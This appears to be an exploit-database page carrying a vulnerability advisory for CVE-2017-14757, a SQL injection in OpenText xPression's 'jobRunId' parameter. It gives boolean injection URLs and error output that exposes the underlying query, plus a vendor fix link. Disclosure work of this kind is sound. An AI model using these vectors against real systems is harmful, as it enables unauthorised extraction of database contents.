"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection"

Author

Exploit author

"Marcin Woloszyn"

Platform

Exploit platform

jsp

Release date

Exploit published date

2017-10-02

                
                    
                         Download file
                    
                
            
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

SQL Injection:
==============

Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.

Vector :
--------

True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2

Additionally:

http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa

Results in the following error in response:

HTTP/1.1 200 OK
[...]
  <b>Errors:&nbsp;</b>

  See nested exception&#x3b; nested exception is&#x3a;
java.lang.RuntimeException&#x3a;
com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method
getJobRunsByIds did not succeed because of a database operation
failure.&#x3b;
&#x9;---> nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;
Database syntax error &#x3a;SELECT  JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;
&#x9;---> nested java.sql.SQLSyntaxErrorException&#x3a;
ORA-00933&#x3a; SQL command not properly ended

An attacker can see whole query and injection point. This can also be
used for error-based data extraction.

Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

Contact:
========
mw[at]nme[dot]pl

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2019-11-12	"Atlassian Confluence 6.15.1 - Directory Traversal"	webapps	jsp	max7253
2019-11-12	"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)"	webapps	jsp	max7253
2019-09-16	"NetGain EM Plus 10.1.68 - Remote Command Execution"	webapps	jsp	azams
2019-07-26	"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection"	webapps	jsp	"Wietse Boonstra"
2019-07-26	"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)"	webapps	jsp	"Wietse Boonstra"
2019-07-26	"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution"	webapps	jsp	"Wietse Boonstra"
2019-06-11	"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting"	webapps	jsp	"Valerio Brussani"
2019-06-05	"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery"	webapps	jsp	k8gege
2019-05-10	"dotCMS 5.1.1 - HTML Injection"	webapps	jsp	"Ismail Tasdelen"
2019-03-11	"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)"	webapps	jsp	AkkuS

Release Date	Title	Type	Platform	Author
2017-10-02	"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection"	webapps	jsp	"Marcin Woloszyn"
2017-10-02	"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection"	webapps	jsp	"Marcin Woloszyn"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.